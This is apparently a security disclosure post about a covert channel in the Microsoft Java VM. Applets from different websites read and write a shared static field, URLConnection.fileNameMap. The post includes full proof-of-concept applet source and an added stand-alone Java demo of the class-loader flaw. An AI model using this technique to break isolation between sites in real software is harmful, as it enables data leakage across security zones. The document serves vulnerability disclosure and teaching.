Covert Channel in MSJVM , 5.0 Release 5.0.0.3810
Hi y'all,
I have not found the contact address for Microsoft JVM
security issues, therefore maybe someone who reads
Bugtraq can forward this:
In the Microsoft (R) VM for Java, 5.0 Release 5.0.0.3810,
the implementation of some core system classes allows the
creation of covert channels between applets that are
loaded from different websites (aka cross-site Java).
The applets share a common class loader for the system
classes, so every public static (non-final) field of those
classes is one and the same variable for all of them, and the
sandbox does not restrict reading or writing such fields. Any
such field can therefore be used as a covert channel to exchange
cross-site information. This may be used for security zone
violation and general data leakage.
When you load the two applets into two windows of the same IE (open the second window with Ctrl+N):
A:http://www.tauwerkkunst.de/javatest/SiteA/CovAppletFNMap.html
and
B:http://www.beauchamp.de/tauwerk/javatest/SiteA/CovAppletFNMap.html
you can use the commands
PUT/Key/Value to create an entry in the shared hashtable of the applets
GET/Key to read an entry from the shared hashtable of the applets
'Key' and 'Value' are string values.
So if you enter PUT/TopScorer/Makaay in the lower textbox and press "Perform
Action", then switch to applet B (which looks identical), enter
'GET/TopScorer' and press "Perform Action", you are presented with 'Makaay',
information that should be known only to applet A.
For a demonstration try yourself or look at the first screenshot below [pic1].
I think this is a major violation of sandbox constraints.
Prerequisite is that both applets are started by the same IE process (Ctrl+N opens the
second window in the same process), so that the JVM and its memory are shared. Two IE
processes mean two JVMs and of course no covert channel; you then get an error like in the
second screenshot [pic2].
Sincerely
Marc Schoenefeld
P.S: Read some more java stuff at www.illegalaccess.org
P.P.S: Thanks to Siva Subbu for the remarks concerning the error messages
pic1, how it should look
pic2, oops, you did not use Ctrl+N
// CovAppletFNMap.java -- the applet. Both sites serve an identical copy. The only state it
// relies on lives in URLConnection.fileNameMap, a public static (non-final) field of a system
// class; the shared system class loader makes that one field visible to every applet in the VM.
import java.net.*;
import java.awt.*;
import java.awt.event.*;

public class CovAppletFNMap extends java.applet.Applet {
    TextArea ta;
    TextField tf;
    Button bu;
    Label la1;
    Label la2;

    // "Perform action": hand the PUT/... or GET/... command to the shared map and show the reply.
    class MyButtonListener implements ActionListener {
        public void actionPerformed(ActionEvent event) {
            String b = URLConnection.fileNameMap.getContentTypeFor(tf.getText());
            ta.append(tf.getText() + ":" + b + "\n");
        }
    }

    public CovAppletFNMap() {
        la1 = new Label("PUT/Key/Value to put in shared Hashtable");
        la2 = new Label("GET/Key to get from shared Hashtable");
        tf = new TextField("", 40);
        ta = new TextArea("", 5, 40, TextArea.SCROLLBARS_NONE);
        add(ta);
        bu = new Button("Perform action");
        add(bu);
        bu.setBackground(Color.orange);
        add(tf);
        add(la1);
        add(la2);
        bu.addActionListener(new MyButtonListener());
    }

    // The first applet to start installs the shared FNMAP; any later applet (from whatever
    // site) finds the field already set and reuses the object. The later applet only ever
    // talks to it through the java.net.FileNameMap interface, so it does not matter that
    // each applet's own class loader would define a separate FNMAP class.
    // The PUT/GET pair is a self-test that works in either case.
    public void start() {
        if (URLConnection.fileNameMap == null)
            URLConnection.fileNameMap = new FNMAP();
        URLConnection.fileNameMap.getContentTypeFor("PUT/Bayern/Magath");
        String i = URLConnection.fileNameMap.getContentTypeFor("GET/Bayern");
        System.out.println(i);
    }

    // Runs the self-test outside a browser (no GUI is shown).
    public static void main(String[] a) {
        new CovAppletFNMap().start();
        System.out.println(URLConnection.fileNameMap.getContentTypeFor("GET/Bayern"));
    }
}
// FNMAP.java -- the covert-channel object. Installed once into URLConnection.fileNameMap, it
// abuses the FileNameMap.getContentTypeFor(String) callback as a tiny command interface.
import java.net.*;
import java.util.*;

public class FNMAP implements FileNameMap {
    Hashtable ht = new Hashtable();

    public FNMAP() {
    }

    // Commands: "PUT/key/value" stores value under key and returns key;
    // "GET/key" returns the stored value; anything else returns "".
    public String getContentTypeFor(String s) {
        int i = 0;
        StringTokenizer t = new StringTokenizer(s, "/");
        String action = "";
        String key = "";
        String value = "";
        while (t.hasMoreTokens()) {
            String tok = t.nextToken();
            if (i == 0) { action = tok; }
            if (i == 1) { key = tok; }
            if (i == 2) { value = tok; }
            i++;
        }
        // A GET for a key nobody has PUT finds null here and toString() throws a
        // NullPointerException. That is the error path an applet hits when it sits in its
        // own JVM (own IE process) and therefore sees a different map (likely the error in [pic2]).
        if (action.equals("GET")) { return ht.get(key).toString(); }
        if (action.equals("PUT")) { ht.put(key, value); return key; }
        return "";
    }
}
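The following stand-alone program is an added example and is not part of Marc Schoenefeld's post or the applets above; it reproduces the mechanism without a browser. Two class loaders each define their own copy of a small "applet" class (Peer), so their own static fields are separate, but the FileNameMap they reach through java.net.URLConnection is defined by the bootstrap loader and is one object for the whole VM, exactly like URLConnection.fileNameMap in the post. It assumes a modern JDK: Sun replaced the public field with URLConnection.getFileNameMap()/setFileNameMap() (the setter calls SecurityManager.checkSetFactory() when a security manager is installed), so the demo uses those accessors and runs with no security manager. Peer, ChannelMap, IsolatingLoader and the TopScorer/Makaay sample values are the example's own names, not anything from the MSJVM.

```java
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.net.FileNameMap;
import java.net.URLConnection;
import java.util.Hashtable;

public class SharedStaticDemo {

    // The "applet". Each IsolatingLoader defines its own Peer class, so ownCounter is
    // per loader; the FileNameMap it uses belongs to java.net.URLConnection (bootstrap
    // loader) and is therefore shared by every copy of Peer in the VM.
    public static class Peer {
        public static int ownCounter = 0;

        public static String put(String key, String value) {
            ownCounter++;
            return URLConnection.getFileNameMap().getContentTypeFor("PUT/" + key + "/" + value);
        }

        public static String get(String key) {
            ownCounter++;
            return URLConnection.getFileNameMap().getContentTypeFor("GET/" + key);
        }
    }

    // Same PUT/key/value and GET/key grammar as the post's FNMAP, but null-safe on unknown keys.
    static class ChannelMap implements FileNameMap {
        private final Hashtable<String, String> ht = new Hashtable<>();

        public String getContentTypeFor(String s) {
            String[] p = s.split("/", 3);
            if (p.length >= 3 && p[0].equals("PUT")) { ht.put(p[1], p[2]); return p[1]; }
            if (p.length >= 2 && p[0].equals("GET")) { String v = ht.get(p[1]); return v == null ? "" : v; }
            return "";
        }
    }

    // Defines Peer itself instead of delegating to the parent, so two instances yield two
    // distinct Class objects, modelling two applets from different sites. Every other class
    // (including java.net.URLConnection) is still delegated upward and hence shared.
    static class IsolatingLoader extends ClassLoader {
        IsolatingLoader() { super(SharedStaticDemo.class.getClassLoader()); }

        @Override
        protected Class<?> loadClass(String name, boolean resolve) throws ClassNotFoundException {
            if (!name.equals(Peer.class.getName())) return super.loadClass(name, resolve);
            synchronized (getClassLoadingLock(name)) {
                Class<?> c = findLoadedClass(name);
                if (c == null) {
                    byte[] b = readClassBytes(name);
                    c = defineClass(name, b, 0, b.length);
                }
                if (resolve) resolveClass(c);
                return c;
            }
        }

        // Reads Peer's bytecode from the class path so it can be defined a second time.
        private byte[] readClassBytes(String name) throws ClassNotFoundException {
            String res = name.replace('.', '/') + ".class";
            try (InputStream in = SharedStaticDemo.class.getClassLoader().getResourceAsStream(res)) {
                if (in == null) throw new ClassNotFoundException(name);
                ByteArrayOutputStream out = new ByteArrayOutputStream();
                byte[] buf = new byte[4096];
                int n;
                while ((n = in.read(buf)) > 0) out.write(buf, 0, n);
                return out.toByteArray();
            } catch (IOException e) {
                throw new ClassNotFoundException(name, e);
            }
        }
    }

    public static void main(String[] args) throws Exception {
        URLConnection.setFileNameMap(new ChannelMap());   // the one VM-wide object

        Class<?> a = new IsolatingLoader().loadClass(Peer.class.getName());
        Class<?> b = new IsolatingLoader().loadClass(Peer.class.getName());
        System.out.println("same Peer class? " + (a == b));   // false: separate namespaces

        a.getMethod("put", String.class, String.class).invoke(null, "TopScorer", "Makaay");
        Object leaked = b.getMethod("get", String.class).invoke(null, "TopScorer");
        System.out.println("B reads what A wrote: " + leaked);  // Makaay

        // Statics of a per-loader class are NOT shared: each copy counted only its own call.
        System.out.println("A.ownCounter=" + a.getField("ownCounter").get(null)
                         + " B.ownCounter=" + b.getField("ownCounter").get(null));
    }
}
```

Compile and run with javac SharedStaticDemo.java && java SharedStaticDemo. The contrast between the two printed lines is the whole point: per-loader statics (ownCounter) isolate A from B, while any mutable static reachable through a bootstrap-loaded class does not, which is why a sandbox has to guard such fields (or make them private behind a permission-checked setter) rather than rely on class-loader separation alone.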